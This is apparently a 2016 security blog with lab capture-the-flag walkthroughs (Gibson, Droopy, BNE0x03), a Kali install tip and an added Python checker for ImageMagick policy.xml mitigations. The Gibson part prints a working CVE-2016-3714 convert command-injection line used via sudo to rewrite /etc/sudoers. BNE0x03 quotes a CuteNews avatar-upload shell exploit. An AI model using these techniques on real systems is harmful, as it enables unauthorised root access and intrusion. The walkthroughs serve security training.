Tuesday, 24 May 2016

Gibson challenge

Good, we have found our target. Now we are able to scan a little deeper.

Great! We are dealing with a simple VM, because only two ports are open: 80 and 22. I prefer to examine the web application.

Hmmm, does it look strange to you too? Let's check what is in davinci.html.

Probably it is some kind of hint. I am thinking about brute-forcing SSH, but I know neither the username nor the password. In this case brute force would take a long time. So, let's run dirbuster.
Hmmm, dirbuster found nothing interesting. I tried a brute-force attack with the username davinci, but without success :-(
So, we should examine the versions of the Apache web server and OpenSSH. As far as I know, OpenSSH may be vulnerable to a predictable PRNG. Damn it! That also gave me nothing interesting... Now I am pretty sure that /davinci.html MUST contain something helpful!

Probably the username is margo and the password is god; let's try to log in via SSH.

Excellent! We have got a limited shell! Let's check what kind of actions we are able to perform via sudo.
Quite interesting!
I have verified that we are dealing with Ubuntu 14.04.03, so I know that a local root exploit exists.

Game over! Thanks

As we can see, the challenge was very easy and didn't require advanced hacking tools or skills. All we needed was time.

PS. I am going to try to find another way to hack this machine.

Second way - privilege escalation.
I was looking for details about the Linux convert command and potential vulns, and I found CVE-2016-3714.
So, we are able to inject any shell command into the convert syntax.
Well, I have added write permission for root to the sudoers file via
sudo convert 'https://example.com"|chmod +x "/etc/sudoers' out.png
and I have changed part of its content to
margo ALL= (ALL:ALL) ALL

We have got root again :-)
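The fix ImageMagick documented for CVE-2016-3714 is a set of coder denials in policy.xml (on Ubuntu 14.04 the file lives under /etc/ImageMagick/). The following is an added Python check, not code from this post or from the ImageMagick project: it parses a policy file and reports which of those denials are missing, using a constructed weak policy beside a constructed hardened one.

```python
import xml.etree.ElementTree as ET

# Coders that CVE-2016-3714 abuses: with them enabled a crafted image can make
# convert fetch remote content or run a delegate command (as in the post).
# Denying them in policy.xml is the mitigation ImageMagick documented for
# installs that cannot be upgraded.
RISKY_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def denied_coders(policy_xml: str) -> set:
    """Return the set of coder names that the policy denies (rights="none")."""
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder" or pol.get("rights") != "none":
            continue
        # policy.xml also accepts a brace list such as pattern="{URL,MVG}"
        for name in pol.get("pattern", "").strip("{}").split(","):
            if name.strip():
                denied.add(name.strip().upper())
    return denied


def missing_mitigations(policy_xml: str) -> set:
    """Risky coders the policy still allows; an empty set means mitigated."""
    return RISKY_CODERS - denied_coders(policy_xml)


# Constructed sample: a policy that only limits resources and leaves every
# coder enabled, i.e. the state exploited in the post.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

# Constructed sample: the same file with the five coder denials added.
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""

if __name__ == "__main__":
    for label, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        gaps = sorted(missing_mitigations(pol))
        print(f"{label}: missing denials -> {gaps or 'none'}")
```

The policy only limits which coders convert will use; letting convert run via sudo at all is the larger finding, since any code-execution bug in it then runs as root.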

Sunday, 22 May 2016

Kali Linux 2.0 on VMWare

Hi all,
I had a lot of problems with the performance of my Kali Linux 2.0 on VMWare Workstation. I downloaded an iso image from the official Kali Linux website. After installation on VMWare Workstation I had problems - Kali Linux was working very slowly (for example when launching a web browser). I experimented with processor options, etc. I changed the desktop environment from GNOME to XFCE. Everything I tried - without success.
In my case one approach achieved my goal - a Kali Linux 2.0 which works and isn't lagging.
I downloaded the Kali Linux 2.0 Light version (this version doesn't contain all tools) and I installed everything that Kali Linux 2.0 Full has via the following command:
sudo apt-get upgrade -y && sudo apt-get install kali-linux-full -y
Now I am very glad that I have an efficient Kali Linux 2.0 full install with the XFCE desktop environment :-)

Friday, 6 May 2016

Droopy CTF

Today I'm going to present a walkthrough of the Droopy challenge.
root@osboxes:~# nmap -sP

Nmap scan report for
Host is up (0.00054s latency).
MAC Address: 00:0C:29:4F:82:66 (VMware)

root@osboxes:~# nmap -p-

80/tcp open  http
MAC Address: 00:0C:29:4F:82:66 (VMware)
I open a browser and display the web application.

OK, I tried SQL injection and a default-credentials attack, but without success. So I examined the source code and BINGO!

Drupal 7 contains several vulnerabilities. I found one of them - SQL injection - I executed it and...

Excellent! We should verify this good news.

Great! We are logged into the admin account! We have to find some way to upload a backdoor. I tried the Avatar and Add Content features, but without success.
Finally I found helpful options.

Now we should check the PHP Filter module and try to inject our reverse shell code into the page content.


Excellent! We have gained a limited shell!
We can check the OS details and find an exploit to escalate our privileges (as an exercise for you).

Game over!

BNE0x03 challenge

Hi again,
Today I would like to present a BNE0x03 walkthrough.

So, as always, we should find our target.
root@osboxes:~# nmap -sP

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:02 BST
Nmap scan report for
Host is up (0.0018s latency).
MAC Address: 00:0C:29:4E:16:F6 (VMware)

root@osboxes:~# nmap -sV

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:05 BST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Scanning all ports does not give us a different result.
Now, we browse our target.

Maybe some exploit exists for CuteNews v.2.0.3? I don't know, but I will probably verify it.
Let's run dirb now.
root@osboxes:~# dirb

==> DIRECTORY:
==> DIRECTORY:
+ (CODE:200|SIZE:1150)
+ (CODE:200|SIZE:2487)
+ (CODE:403|SIZE:293)
==> DIRECTORY:
It looks interesting; probably the application has an upload feature.
I tried to bypass authentication via SQL injection, but without success. But I found an exploit for CuteNews 2.0.3.
 # Exploit  :
Vuln :
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell :
OK, so we have to follow the instructions. I registered an account
and I am logged into the application now :-)

Great, now we have to go to the Personal options and upload our avatar (reverse shell). I uploaded my reverse shell file and I got

Excellent, we have got a limited shell.
$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I know that all we need is an exploit to get root privileges. I found the Ubuntu 14.04 LTS, 15.10 - overlayfs Local Root Exploit.
I leave you now at this stage to complete the challenge as an exercise for you :-)

Game over!